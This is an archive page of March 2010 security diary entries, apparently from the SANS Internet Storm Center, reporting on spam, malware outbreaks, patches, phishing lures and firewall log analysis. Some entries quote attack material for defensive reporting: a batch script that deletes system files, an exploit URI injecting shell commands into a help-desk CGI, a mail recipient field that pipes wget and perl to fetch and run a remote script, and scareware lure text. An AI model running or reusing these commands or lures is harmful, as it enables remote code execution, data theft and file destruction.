Dangers of copy&paste

One of our readers, Bill, wrote in to let us know about a pretty dangerous batch script that was posted on a web site that he visited. The script is supposed to help users get rid of print jobs which are still in the spooler, but a couple of obvious errors were done. I am pasting the original, as it was on the web site below (of course, do not run this):

@echo off
echo Stopping print spooler.
echo.
net stop spooler
echo deleting stuff... where? I'm not sure. Just deleting stuff.
echo.
FOR %%A IN (%systemroot%  system32  spool  printers     *.*) DO DEL %%A
echo Starting print spooler.
echo.
net start spooler

The script is, as you can see, very simple – all it does is stop the printer spooler (the spooler service) and then it is supposed to delete all files in the %systemroot%system32spoolprinters directory. Unfortunately, the author (accidentally?) added couple of white spaces so this script became extremely dangerous: it will try to delete all files in the %systemroot% directory, in C: and in the current directory.

This simple error shows how dangerous it can be to just blindly copy&paste stuff off the Internet and run it in your environment. While in this case it was easy to spot the error since the whole script is only 10 lines long, in other cases we should be very careful.

I also noticed another thing very popular today – in order to faster download stuff off the Internet (legal stuff, such as Linux distributions), people tend to use a lot of different utilities that are supposed to provide faster download speeds. Such utilities can be simple Bittorrent clients or dubious utilities that will download unverified things from even more dubious web sites. And this leads me to a question: how many of you verify integrity of files you download? It would be interesting to compare the number of downloaded ISO images of popular Linux distributions with the number of downloaded checksum files – I fear that less than 1% people verify what they download. I hope in time this number will increase!

--
Bojan

 

5 Comments

Published: 2010-03-17

Spam was killing us! Here is what we did to help!

 

I work for a smallish ISP in the Midwest.  In late September and the month of October we began getting blasted with spam and DHA's from all over the world.  We had been utilizing a spam filtering service but it was not keeping up. We billed the customers for the service and they were starting to complain. They were getting so much spam in their inboxes that they felt like they were wasting their money.  In October when the problem became so bad that it started affecting our mail servers ability to process mail any longer we knew we had to do something.  We had been "test driving" a spam filter device by Red Condor.  The accounts that had been moved over to the Red Condor filter were virtually spam free. We decided to implement the Red Condor solution across the board on the server that was being hammered the worst.  This server has just over 9,000 accounts on it.  We turned up the Red Condor box at about 4pm and by 7:00am the next morning the quarantine boxes had been created for all customers.  No interaction required, it simply verified each inbox as the emails arrived for the account.  If the account did not exist it threw the spam away, if the account did exist it created the inbox and then determined whether the email was spam or was legit (autodiscover does not work with Exchange Servers).

We decided to "give the service away" as part of the customers Internet service.  In reality we have been the ones to benefit from the service.  The mail server has been purring along for months now and our customers are much happier.  They literally have had no spam hit their inboxes.  We have been in the learn mode for a while and slowly started migrating other customers over to the device.  It has not missed a hit.  The other thing that is amazing is the ease in setting up the "accounts" on Red Condor.  With the previous service it was about a 15 minute process to setup each domain.  It was a series of long drawn out steps to setup the accounts.  With Red Condor it takes less than a minute to setup a new account/domain.  If I can use autodiscover to create the inboxes then the setup task is done.  Change the MX record and I am good to go.

Now here is the amazing part.  The reporting available with the product is unbelievable.  At a glance I can see just how much work this single device is doing.  Here is a report for the domain that has just over 9,000 accounts.  This is a summary of the transactions handled for the domain since March 1, 2010.   You see that out of almost 20 million emails handled only 713,222 (3.6%) were actually delivered.

March 2010

 

Disposition

 

Category

Deliver

Markup

Quarantine

Block

Total

 

Size

 

OK

638,116

 

 

 

638,116

3.2%

108GB

32.1%

Unprotected

2,905

 

 

 

2,905

0.0%

60MB

0.0%

Friends

72,201

 

 

 

72,201

0.4%

17GB

5.2%

Enemies

 

 

176

 

176

0.0%

31MB

0.0%

Virus

 

 

 

55,587

55,587

0.3%

7,109MB

2.1%

Phish

 

 

434,661

2,218

436,879

2.2%

1,165MB

0.3%

Keyword

 

 

 

 

0

0.0%

0

0.0%

Adult

 

 

 

106,296

106,296

0.5%

270MB

0.1%

Spam

 

919

13,412,089

42,939

13,455,947

68.1%

154GB

45.9%

Junk

 

1,718

349,796

697

352,211

1.8%

9,223MB

2.7%

Blank

 

 

489

2

491

0.0%

1,073KB

0.0%

Foreign

 

 

12,707

33

12,740

0.1%

159MB

0.0%

Risky Attachment

 

 

16

 

16

0.0%

18MB

0.0%

Unresolved Sender

 

 

 

 

0

0.0%

0

0.0%

Invalid Recipient

 

 

 

4,623,107

4,623,107

23.4%

38GB

11.3%

Total

713,222

2,637

14,209,934

4,830,879

19,756,672

 

335GB

 

 

3.6%

0.0%

71.9%

24.5%

       


It isn't hard to understand now why my poor mail server was weeping on a daily basis.  We are now in the process of moving the remaining customers, accounts and domains over to the Red Condor system.  

Spam and viruses have become such a big problem for ISP's world wide.  Until we can clean up the infected machines that are generating this spam and shut down the bad guys that are pushing this garbage at us, it is good to know that these types of systems exist.  

I would like to hear from our reader's.  What has helped your organization deal with spam and the pr

14 Comments

Published: 2010-03-17

Trojan outbreak on a College Campus

One of our readers just advised us that the college that he is associated with has had a major outbreak of  Trojan.Win32.Scar.bwgf (Kaspersky).  Michael reported:

"We are now in major clean up mode.  All the file servers have been removed from the network to prevent further spread.

Basically the virus hides all the files in a directory and the directory itself.  It then adds a file of 74K with the same name as the file with a .exe.  So a user wishing to open
their word document would actually be infecting themselves with the virus."

Michael asked if we had received any other reports of infection from this Trojan.  A quick look on Google it appears that some variation of this has been around for a while.  
It looks like his campus may be dealing with an updated version. 
 

If anyone else is seeing any activity for this Trojan give us a shout.  Thanks Michael for reporting this to us.

 

Deb Hale Long Lines, LLC

6 Comments

Published: 2010-03-16

Internet Explorer 9 "Platform Preview" Now Available From Microsoft

Microsoft released a "Platform Preview" version of the next version of Internet Explorer. You can download it from http://ie.microsoft.com/testdrive/Default.html. There are several security implications of this release:

  1. Security professionals may be interested in exploring what security features and enhancements (if any) are built into Internet Explorer 9
  2. Attackers may be interested in exploring what vulnerabilities (if any) exist in the code added to Internet Explorer 9
  3. Attackers may start using the lure of installing Internet Explorer 9 as part of phishing and drive-by campaigns

Regarding point #3... At the moment, searching for "Internet Explorer 9" doesn't provide many links that look malicious. I suspect this will change as malicious sites using Search Engine Optimization (SEO) techniques will spring into action to take advantage of people's interest in the new browser.

Have you had a chance to look at Internet Explorer 9? Let us know your security-related observations.

-- Lenny

Lenny Zeltser - Security Consulting
Lenny teaches malware analysis at SANS Institute. You can find him on Twitter.

0 Comments

Published: 2010-03-16

Trouble Ticket Express Exploit in the Wild a Day After the Vulnerability Announcement

The time between the announcement of a vulnerability and seeing the exploit in the wild is short, especially if the announcement includes proof-of-concept code. A day ago, a proof-of-concept exploit in Trouble Ticket Express help desk software was made public. Just a day later, ISC reader Ben saw the exploit in the wild:

64.15.159.171 - - [15/Mar/2010:18:42:23 -0700] "GET /ttx.cgi?cmd=file&fn=%7C%65%63%68%6F%20%2D%6E%20%62%75%66%75%77%75%7A%68%65%72%3B%65%63%68%6F%20%65%7C HTTP/1.1" 403 960 "-" "Plesk"

The decoded version of this particular URI is:

/ttx.cgi?cmd=file&fn=|echo%20-n%20bufuwuzher;echo%20e|

The targeted vulnerability in the application could allow the attacker to execute arbitrary code on the system.

If you are running Trouble Ticket Express version 3.01 or lower, update the program's File Module or disable access to the TTXFile.pm module on your server.

 -- Lenny

Lenny Zeltser - Security Consulting
Lenny teaches malware analysis at SANS Institute. You can find him on Twitter.

1 Comments

Published: 2010-03-15

Spamassassin Milter Plugin Remote Root Attack

Observant reader Roy caught an interesting exploit attempt against his SMTP server. His review of the logs turned up this:

Messages rejected to recipient: root+:|wget
       hxxp://www.linux-echo.de/.x/p.txt;perl p.txt:   smtp.target.com[10.11.17.18] : User unknown in local recipient
       table; from=<blue@attacker.com> to=<root+:|wget
       hxxp://www.linux-echo.de/.x/p.txt : 1 Time(s)

Handler Bojan notes that it appears that the bad guys have started to actively exploit SpamAssassin's milter vulnerability that has been published last weekend (more details at http://archives.neohapsis.com/archives/fulldisclosure/2010-03/0139.html).

The perl script collects some information about the local host and tries to send it to 203.59.123.114 on port 80 -- this host appears to be unreachable at the moment though.

Cheers,
Adrien de Beaupré
EWA-Canada.com

 

4 Comments

Published: 2010-03-14

DST Issue in Windows 7 Ultimate?

One of our readers reported that his copy of Windows 7 Ultimate failed to update itself overnight with the change to Daylight Saving Time.  We have not had any other reports of this, but are curious if any readers have seen any DST difficulties with Windows 7.  It may have been a local configuration error, but it's always good to ask around for other observations.

Thanks for the note Ramu.

Marcus H. Sachs
Director, SANS Internet Storm Center

9 Comments

Published: 2010-03-13

Evil Sports Sites

One of our regular readers submitted a Google query to us that points to yet another temptation that the criminals are taking advantage of - the March Madness basketball tournaments here in the USA.  I'm sure that other sporting events are just as popular with the scammers and crooks.  If you want to check out the fun, put this into your browser:

http://www.google.com/search?q=big+ten+tournament+2010+wiki

We trust that you are not crazy enough to click on the links that Google marks as hazardous to your computer's health, but if you do and you net something really cool that you'd like to analyze, please let us know what you uncover.  Use the comment feature below or send us a note via our contact form.

Thanks Melvin for the info!

Marcus H. Sachs
Director, SANS Internet Storm Center

1 Comments

Published: 2010-03-11

Interesting SKYPE SPIM.

Earlier this week Jared sent us an interesting SKYPE spim. I suspect this was sent using the Skype IMbot discussed in the previous diary.
This one was a social engineering attempt to get the recipient to load scareware or fakeAV. Like most of these sites it had some java that is intended to simulate an antivirus scan. The scan is free of course. Everyone that gets "scanned" by this junk is infected. Getting cleaned of your viruses costs since you have to buy the commercial version to "clean" your infection. They have nice little functions like "hideActiveXDialog" and a doUpdatePercents which simply counts off tics to make it appear they are scanning the system. Then they throw up a banner2.jpg which is a warning that you have a bunch of scarey viruses including "System Soap Pro", AntiLamer Light, MC 30 day, SoftEther, I-Worm.NetSky.q, I-Worm.Bagle.n, Tofger-A, Zinx-A, B-S Spy 1.90 and KrAIMer 1.1"

Some of those names are known malware others appear to have been made up to insult anyone that gets this message. Who came up with System Soap, AntiLamer, SoftEther or BS spy. Here is the text that was sent out to entice victims to pay for this LAME fake AV.

WINDOWS REQUIRES IMMEDIATE ATTENTION
URGENT SYSTEM SCAN NOTIFICATION ! PLEASE READ CAREFULLY !!

hxxp://www.onlineck.org

For the link to become active, please click on 'Add to
contacts' skype button or type it in manually into your web browser !

FULL DETAILS OF SCAN RESULT BELOW
****************************************

WINDOWS REQUIRES IMMEDIATE ATTENTION

ATTENTION ! Security Center has detected
malware on your computer !

Affected Software:

Microsoft Windows Vista
Microsoft Windows XP
Microsoft Windows 2000
Microsoft Windows Server 2003

Impact of Vulnerability: Remote Code Execution / Virus Infection /
Unexpected shutdowns
 
Recommendation: Users running vulnerable version should
install a repair utility immediately

Your system IS affected, download the patch from the address below !
Failure to do so may result in severe computer malfunction.

http://www.onlineck.org/
 
For the link to become active, please click on 'Add to
contacts' skype button or type it in manually into your web browser!”


 

0 Comments

Published: 2010-03-11

Cert write up on Skype IMBot Logic and Functionality.

CERT.at has provided a good technical analysis of a Skype IMBot.
The authors, Christian Wojner, L. Aaron Kaplan, did a good job of analysis of this IMBot.
They also "swapped notes" with Aaron Hackworth of secureworks.com. Such public/private collaboration I find to be very encouraging.

This is a fairly new vector. I have seen other IM based malware using skype IM so it’s not brand new but not too common yet either. The malware detects many Reverse Engineering applications and attempts to make the system unbootable if any type of RE is detected. It uses a new (novel) method to hide its processes/files. It scans local networks for 445 probably to exploit one of the many Microsoft vulnerabilities that can be exploited via that service. It uses "conficker like" encryption. It had logic to "infect" usb drives.

I really enjoyed this analysis as it included some interesting approaches and pointed to functionality that appeared to be in the bot but they were unable to trigger within their RE environment.
http://cert.at/static/downloads/papers/cert.at-an_analysis_of_the_skype_imbot_logic_and_functionality_1.2.pdf
 

0 Comments

Published: 2010-03-10

Microsoft re-release of KB973811 - attacks on Extended Protection for Authentication

Yesterday Microsoft re-released KB973811 ==> http://www.microsoft.com/technet/security/advisory/973811.mspx

This relates back to the original KB973917 ==> http://support.microsoft.com/kb/973917

and advisory MS09-071 ==> http://www.microsoft.com/technet/security/bulletin/ms09-071.mspx

This affects the Extended Protection for Authentication functions within XP, Vista and Server 2003 ==> http://support.microsoft.com/kb/968389

It didn't show up in yesterday's Patch Tuesday review because Microsoft is classifying it as a "non-security upgrade". This is confusing to me, because the update actually includes mitigation against a credential forwarding attack, which you might see on an unencrypted, unsigned connection (yes, there's still a lot of that going around ! )

This update affects XP, Vista and Server 2003.  Windows 7 and Server 2008 R2 are not affected.

Thanks to our readers on letting us know about this one.  I'm still puzzled as to why this wasn't on Microsoft's list of security updates ...

=============== Rob VandenBrink Metafore ===============

2 Comments

Published: 2010-03-10

Microsoft Security Advisory 981374 - Remote Code Execution Vulnerability for IE6 and IE7

Several readers have pointed us towards this advisory.  This Microsoft advisory outlines a vulnerability in Internet Explorer 6 and 7, which could allow remote code execution.  While there are some mitigations available for IE7 (the Enhanced Security Mode) in Server 2003 and Server 2008, the best advice is to upgrade to Internet Explorer 8, which is not vulnerable.

Find the advisory here ==>  http://www.microsoft.com/technet/security/advisory/981374.mspx

=============== Rob VandenBrink, Metafore ==============

1 Comments

Published: 2010-03-10

What's My Firewall Telling Me? (Part 4)

There’s been a lot of discussion about the recent stories on parsing firewall logs  - Mark’s story at http://isc.sans.org/diary.html?storyid=8293 , Daniel’s story at http://isc.sans.org/diary.html?storyid=8347 ,  and Kyle’s at http://isc.sans.org/diary.html?storyid=8362  have covered a number of methods and tools for plumbing the depths of your firewall logs. 

In these stories, it’s been stressed that there’s gold in them there logs!  Reviewing your logs is legally required under several regulatory frameworks, and just plain makes sense – reviewing inbound and outbound traffic is an excellent way to find stuff being sent or received that shouldn’t be happening, finding malware or finding violations of corporate policies.

But, you say, that’s all great, but many firewall logs are over 500MB per day, and if you're not a command line guru with grep, uniq, sort, awk or perl, what do you do?  Or what if the firewall log output is just so much scrambled eggs to you? How are you supposed to plow through all that text and data for the few pearls that you can expect to find that might indicate a problem?  For me, the answer is easy, use tools that summarize Netflow data.  Netflow is a facility that is available on many network devices that examines all the traffic through the device interfaces, and summarizes it by source and destination IP address, as well as source and destination port and how much data was sent or received..  It then sends this summarized data to a server application called a Netflow Collector.  Netflow is generally associated with Cisco gear, but there is an RFC equivalent in sFlow (RFC 3176) that is implemented by many other vendors, or a Juniper specific version in jFlow.

Continuing on, the Netflow collector then stashes this data into a database, and then gives you a nice web front-end to the data, allowing you to slice and dice the addresses and associated values in prepackaged reports, or do ad-hoc queries.  So if you want to see why internet bandwidth was maxed out last Tuesday over lunch, who the culprit was and what they were doing, it’s a piece of easy!

It sounds complicated, but in practice it’s generally about 4-5 lines of config on the device (router, switch or firewall - check your documentation for specifics), and a GUI setup on the server.  There are lots of Netflow Collector apps out there, I won’t start the religious war of stating that one is better than another – I use any one of 7 or 8 different ones, depending on which client I’m working with that day.

Let’s take a look at a typical “let’s review the firewall activity” session that you might have as part of your daily routine.  This data is from a client site where I set Netflow up last week, I was going through an orientation session with the client IT Team (which is also the Incident Handling team at this organization), as well as using the tool in response to widespread user complaints about internet performance issues.

Let’s start at the TCP applications (aka sort data by TCP destination port) screen – in this example we’re just looking at the data from the last hour, for the inside interface of the firewall.


 
On the face of it, all looks well, all the usual suspects are there, but let’s dig a bit deeper – let’s take a closer look at SMTP.


 


The SMTP traffic looks pretty much as we expected – lots and lots of mail being sent from the mail server ( 10.0.0.73 ).  But hey – what’s that station 10.0.0.233? - should there be another SMTP sender?  After some digging, it turns out we had a workstation using a personal POP/SMTP email client from work – this was a clear violation of the Acceptable Use Policy at this organization.

Let’s go back to the main screen, and dig into the “TCP_App” section, which is the "bit bucket" that this particular Netflow application puts things into when it doesn’t recognize what the target tcp port is.



Jackpot!  What we have here is a number of stations, all running peer-to-peer applications (each line is a different target ip address).  This was no surprise two days after the Oscars, but this is another clear violation of this Organization’s Acceptable Use Policy, and one of the best ways to introduce malware into the Organization as well.  Not only that, it takes LOTS of bandwidth and LOTS of address translation resources (aka memory) at the firewall – sessions like this can easily affect Internet performance for the entire corporation.   Depending on the country, this might be a great way to get sued under copyright infringement as well !

Now let’s look at the data a bit differently – let’s look at session totals over the last hour by IP address, sorted by volume.



Take a look at that first line – that’s a station on the inside, using an “anonymizer” proxy out on the internet (tcp/8080).  OUCH – that’s someone who is not only violating policy, they’re knowingly trying to cloak their actions.  They’re also the heaviest user in the last hour.  Again, we’re 2 days after the Oscars, so it’s no mystery what that 200mb session is all about.  But on any other week, there would be a real chance of finding some “call the cops” type illegal activity going on with proxy sessions like this.

Needless to say, after this short exploration, we're working on a egress filter for this firewall.  The "we trust our users" position not only ignores the fact that even if you trust your users, trusting your users' malware should be part of your business model, but as you can see from this, you can't trust (all of) your users either.

You can see from this that using a good Netflow Collector application will give you a great window into the traffic transiting your firewall or router, pretty much as granular as you want to be.  We collected all this data in about 10 minutes, running a tutorial for the IT group at the same time.  I still use grep, awk and the rest more than I use Netflow, but a good Netflow app can give you nice management style reports, historical queries into your router or firewall data and really granular analysis with almost no time investment.  If you're not a "CLI person", Netflow can go a long way towards getting you really deep into your firewall activity.

 

=============== Rob VandenBrink, Metafore ==============

10 Comments

Published: 2010-03-09

March 2010 - Microsoft Patch Tuesday Diary

 

 Overview of the March 2010 Microsoft Patches and their status.

# Affected Contra Indications Known Exploits Microsoft rating ISC rating(*)
clients servers
MS10-016   Vulnerability in Windows Movie Maker Could Allow Remote Code Execution

Moviemaker:
CVE-2010-0265

 KB 975561 no known exploits. Severity: Important
Exploitability: 1 
Important Important
MS10-017   Vulnerabilities in Microsoft Office Excel Could Allow Remote Code Execution
Excel:
CVE-2010-0257
CVE-2010-0258
CVE-2010-0260
CVE-2010-0261
CVE-2010-0262
CVE-2010-0263
CVE-2010-0264
 KB 980150 no known exploits. Severity: Important
Exploitability: 1,2,1,1,2,1,1
Critical Important

We will update issues on this page for about a week or so as they evolve.
We appreciate updates
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY
(*): ISC rating
  • We use 4 levels:
    • PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
    • Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
    • Important: Things where more testing and other measures can help.
    • Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
  • The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leisure work.
  • The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.
  • Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.
  • All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them

--
John Bambenek
bambenek at gmail /dot/ com

 

1 Comments

Published: 2010-03-09

Vodafone Android Phone: Complete with Mariposa Malware

Panda Security has a post up on one of their employees buying a brand new Android phone from Vodafone and discovering it was spreading Mariposa. It didn't infect the phone proper, but it did have autoexec.inf and autoexec.bat files designed to infect whatever Windows machine the phone was plugged into via USB cable. Unlike the Engergizer story from yesterday, this one is happening now. Standard USB defenses apply, don't automatically execute autoexec.bat/inf files from USB devices. This Microsoft KB article discusses how to disable the "Autoplay" functionality that leads to this problem.

This leads to the interesting question, why not just infect the phones? The technology is certainly there to write malware that is phone specific.  We won't see mass infection of phones (or even better, a cell-phone botnet) likely until commerce is much more common on phones.  Malware is driven by the desire of profit and once it becomes profitable, we'll see exploitation.  The problem is, that these slimmed down devices make it difficult to configure in security. Only a few cell phone types even have the option of cell phone antivirus software. The clock is ticking on that threat.

--
John Bambenek
bambenek at gmail /dot/ com

4 Comments

Published: 2010-03-09

Energizer Malware

We received several emails today about the US-CERT analysis of Trojan horse software found in an application designed for a battery recharger.  Our assessment is that due to the dates involved (2007 and 2008) this is likely related to the rash of malware we reported a couple of years ago that was found on digital photo frames, iPods, GPS devices, and other consumer products.  If any of our readers have any additional technical information or observations to share about this case, please use the comment feature below.

Marcus H. Sachs
Director, SANS Internet Storm Center

1 Comments

Published: 2010-03-08

SEO poisoning on TV show

An ISC reader, thanks Paul, notified us about a new SEO (Search Engine Optimization) poisoning attack doing the rounds in the last 6-8 hours. We have talked about this kind of attacks in the past, although they were mainly focused on other hot technological topics, major tragedies, or events. This time, the topic to get on top of the search engines result page is a TV reality show. Specifically, there is a TV show premiere in the US tonight called "Billy the Exterminator". The "wiki billy the exterminator" search term in Google (USE WITH CAUTION: http://www.google.com/search?q=wiki+billy+the+exterminator) shows the poisoning attack.

The compromised sites present the following URL format: /FILE.php?PARAM=billy%20the%20exterminator%20wiki, where FILE is most commonly a three letter file name, and PARAM is an input parameter (one or multiple characters). The affected sites are using a drive by attack, providing victims a fake AV warning message that drives them to download a piece of malware: "Warning! Your computer is vulnerable to malware attacks. We recommend you to check your system immediately. Press OK to start the process now.".

If you manage, or know someone that manages any of the affected sites, we would like to get details about the compromise in order to confirm the vulnerability exploited to get into . Please, send details through our contact page.(PHP related)

--
Raul Siles (www.raulsiles.com)
Taddong is comming soon...

1 Comments

Published: 2010-03-08

Samurai WTF 0.8

A new version of the Samurai WTF (Web Testing Framework) distribution, version 0.8,  has been released this weekend. As a member of the main development team, I'm proud to see that Samurai WTF is becoming the preferred environment for web application security testing.

This new version includes multiple new features, apart from being the first Live DVD version (1.7GB), versus previous Live CD versions (<700MB in size), plus:
- The Samurai WTF Firefox add-ons collection: https://addons.mozilla.org/en-US/firefox/collection/samurai.
- An extensive layout clean-up.
- New SVN capabilities to update the most actively developed web testing tools.
- Metasploit (what allows its integration with other tools, like sqlmap or sqlninja).
- The addition of two well known vulnerable web apps for training and testing purposes, DVWA and Mutillidae.
- Plus new tools and tools updates (see the Changelog within the Live DVD).

Definitely, I recommend you to try it and get the most of this open-source project when evaluating the security of your web applications and sites.

You can gather more details about the Samurai WTF from its main web page, http://samurai.inguardians.com, an OWASP presentation I did on December (available at http://www.radajo.com/2009/12/assessing-and-exploiting-web.html), and download the new version from Sourceforge: http://sourceforge.net/projects/samurai/.

Please, if you are a common user or want to try it, share your comments and improvements through the project mailing list (http://sourceforge.net/mail/?group_id=235785).
--
Raul Siles (www.raulsiles.com)
Taddong is comming soon...

3 Comments

Published: 2010-03-07

DHS issues Cybersecurity challenge

Have some great security awareness ideas?  Feel like no one hears your ideas?  Then you will be interested in a new contest/challenge issued by the Dept. of Homeland Security.  The invitation is to  people from industry and even individuals to enter this event. I know personally from 11 years in this industry talking to national and state level government, as well as  Fortune 50 and small businesses, that the missing link between our ISMS Information Security Management System) and security incidents is the need to increase user awareness.  Some of the handlers were saying that if we can have public interest messages on forest fires, then surely we should use this same platform to recommend best practices for all computer users!

The program is open to anyone, and the closing date is April 30, 2010.  The winners will be invited to an event in Washington D.C. in late May or early June to partner with the DHS to lead in the planning and launch of the Cyber Security Awareness month in October.  Get more information on this contest here:  www.dhs.gov/files/cyber-awareness-campaign.shtm

Even if you don't enter, there is still time to get started planning your event for this year!  I'd love to hear your ideas for your 2010 campaign (if you aren't going to enter). 

Mari Nichols

Handler on Duty

0 Comments

Published: 2010-03-06

Integration and the Security of New Technologies

The topic of deployment of new technology in an enterprise, and how to prepare to secure that technology is one that has come up for discussion recently.  Part of the discussion was a question asked by a reader today as to the deployment of a new system, offering a number of services via the web, and the security of those systems and services.  So my question for comment is “How do we secure this?”

 

In my experience, it is a combination of the Engineering, Testing & Installation with the Site Security team(s) working together during the deployment and initial operational phases of any system.  The Security teams are often times the firsthand and best source of knowledge for the system, or systems, being deployed.  If the Security teams are contracted for the installation and testing of the new technology, then they typically have a reliable way of getting information to/from the developers.  The Site Security teams need to be involved early on in the engineering phase, to ensure the sites current Information Security Infrastructure will readily support the incoming technologies.  Most vendors today can supply deployment and integration guides that the Security teams can provide the site early on as well.

 

I welcome your comments,

 

tony d0t carothers @t isc.sans.org

1 Comments

Published: 2010-03-05

False scare email proclaiming North Korea nuclear launch against Japan

Reader Jim informed us about a scare email tactic that is trying to entice users to open a malicious zip file. The email looks very well done and is supposedly written by the US Department of National Intelligence.  The email basically warns that North Korea has launched a missile at Japan (Okinawa) and that severe destruction has been reported.  At the end of a massive list of US agencies, there is a link to a report.zip file with an executable that doesn't seem to have much virus coverage at the moment.  Only Symantec is identifying it as Suspicious.Insight.  Here is another forum discussing this activity today: http://forums.malwarebytes.org/index.php?showtopic=42360.

It is a shame that Global Thermonuclear War is being used to drop lame viruses.

-Kyle Haugsness

 

3 Comments

Published: 2010-03-05

What is your firewall log telling you - responses

Responses to our earlier diary entries regarding firewall log parsing (story1 and story2) have been trickling in. 

Reader Matthias has some small awk/shell scripts for parsing iptables log files that he shared here: http://sister-shadow.de/hotlink/isc/log-scripts.tar.gz

And reader Christian recommends using Prelude LML (log monitor lackey): http://www.prelude-technologies.com/en/welcome/index.html

Update #1: An anonymous reader also suggests http://www.loganalysis.org/ .

-Kyle Haugsness

2 Comments

Published: 2010-03-05

Javascript obfuscators used in the wild

I have been doing some research on Javascript obfuscators.  Various handlers have done stories in the past on how to reverse engineer obfuscated javascript that does evil things.  But I would be interested in hearing what kind of obfuscators people have been finding being used in the wild.  Are you able to identify the obfuscator just by looking at it?  What are the hardest off-the-shelf obfuscators to reverse-engineer?  I will collect responses and post them throughout the day (unless you wish the information to remain private).

-Kyle Haugsness

2 Comments

Published: 2010-03-05

Unpatched Opera 10.50 and below code execution vulnerability

Several mailing lists and readers (Juha-Matti) are reporting publicly available exploits for Opera 10.50 for Windows and below.  There actually seems to be at least two different vulnerabilities, both unpatched at this time.  One of them seems to be a DoS resulting in a browser crash, but the other looks like it will allow full code execution.  The vulnerability finders seem to indicate that these issues are known to exist in previous versions of the Opera also.  These are fairly serious and until Opera patches them, you may be well advised to stop using them for the time being.

http://secunia.com/advisories/38820/

http://www.vupen.com/english/advisories/2010/0529

 

-Kyle Haugsness

1 Comments

Published: 2010-03-04

salefale-dot-com is bad

We are currently analyzing several reports on sites that contain malicious iframes from google-analitics-dot-net (no, this has nothing to do with the real Google).  The iframes redirect to several sub-domains under salefale-dot-com, where a big pile of exploits lurks. All 8 exploits that we identified so far in the end download the same EXE (Virustotal Link). The pretty good coverage that this fresh file already has indicates that many people must have tripped over those malicious iframes today and sent them in to the AV companies.

The image above shows a small section of the malicious iframe as dished out by salefale-dot-com. The code politely checks to see which version of Adobe Acrobat is installed, and then serves up the PDF exploit most digestible to the target at hand - ranging from the old "collab.geticon" to the recent "media.newplayer" vulnerability.

google-analitics-dot-net, by the way, has interesting whois information ... the domain is registered to ??? in the state of Taliban.  <sarcasm> Some DNS registrars are obviously doing their utmost to catch bogus domain registrations </sarcasm>.

A special thanks to ISC reader Tom for his detailed report, and to Jan B for spotting this one early on!

3 Comments

Published: 2010-03-03

What is your firewall log telling you - Part #2


Following up on Mark Hofman's earlier post ("What is your firewall log telling you"), here's some tips on how a Unix command line can be used to cut a big firewall log file down to size for quick analysis.

In the installation that I use as an example here, the firewall sits between the internal network and the Internet, and only allows the internal proxy server to talk to the Internet. PC's on the internal network must surf over the proxy, and are barred from making direct connections through the firewall. This doesn't mean though that the PC's won't try -- a lot of malware, chat software, file sharing tools, etc are proxy-aware, but frequently also try a "direct" connection first. Looking at the direct connections that internal PCs attempt to make is a good way to find out what's happening on the network...

Let's assume we have a Checkpointish log format like this:

time=2010-03-02 23:59:57 action=drop orig=192.168.1.103 i/f_dir=inbound i/f_name=eth1c0 has_accounting=0 product=VPN-1 & FireWall-1 policy_name=INTERNET src=1.2.3.4 s_port=37586 dst=3.4.5.6 service=3384 proto=tcp rule=16 xlatesrc=8.9.10.11 xlatesport=57517 xlatedport=0 NAT_rulenum=4 NAT_addtnl_rulenum=internal

Let's further assume that we have already checked the connections that the firewall accepts, and that we now only want to look at traffic the firewall blocked. The easiest way to accomplish this is by suppressing all log lines that contain the string "action=accept", as follows

| grep -v "action=accept"

Now is where things get interesting. To make sense of the huge volume of log lines, we have to somehow "boil them down" into the essentials. Piping a log line into a command like this

| cut -d" " -f14-16

will just give us the fields 14-16 of each log line, with "space" used as separator (-delimiter). Your log line format might vary of course, so just count and adapt. In the above example, fields 14-16 amount to "dst=3.4.5.6 service=443 proto=tcp", so this gives us the destinations that our internal PCs attempt to talk to. Applying this "cut" command to the entire log still will give us the same number of lines as we had in the original log, but adding a command like

| sort | uniq -c | sort -rn

combines and counts all identical entries (uniq -c), and then gives us those lines that have the highest counts (sort, -n: by number, -r : reverse order). The result on the firewall log that I used as example here was

36642 dst=194.186.121.68 service=80 proto=tcp
 8616 dst=62.105.135.101 service=80 proto=tcp
 2641 dst=192.168.0.1 service=657 proto=udp
[...]

Once at this stage, the next step is to find out what these destinations are, and which systems we have on the network that are trying to talk to them. In this example, a quick check of "whois" reveals that both the top two IP addresses are in Russia ... and the topmost address had 36642 connection attempts from our network in a single day. Hmmm.....

Extending our original "cut" command above into

| cut -d " " -f12,14-16

now also includes the "source address" (field 12) into the output. If we now filter (grep) the output to only contain the first of the above russian IPs, the entire command line becomes

cat logfile.20100302 | grep -v "action=accept" | cut -d" " -f12,14-16 | grep "194.186.121.68" | sort | uniq -c | sort -rn

36424 src=192.168.140.108 dst=194.186.121.68 service=80 proto=tcp
  218 src=192.168.143.19 dst=194.186.121.68 service=80 proto=tcp


which shows two clients on our internal network (192.168.x) that try to talk to this outside IP address.

Now, the next step is to isolate the process(es) on these two systems that initiate the connections. If the two clients run on Windows, the best bet here is to use "tcpview" from the SysInternals suite. Some patience is called for - since the connection gets dropped by our firewall, it will not be listed as an active (ESTABLISHED) connection. But watching tcpview should eventually show a process that tries to open an outbound connection ("SYN_SENT"). Once the process is known, the "What Does Your Firewall Log Tell You" portion of this investigation is over, and standard malware fighting procedures kick in. SysInternals "ProcessExplorer" is a good next step to learn more about the potentially malicious process.

What is your favorite way to quickly carve out interesting tidbits from huge firewall logs? Let us know!

1 Comments

Published: 2010-03-03

Reports about large number of fake Amazon order confirmations

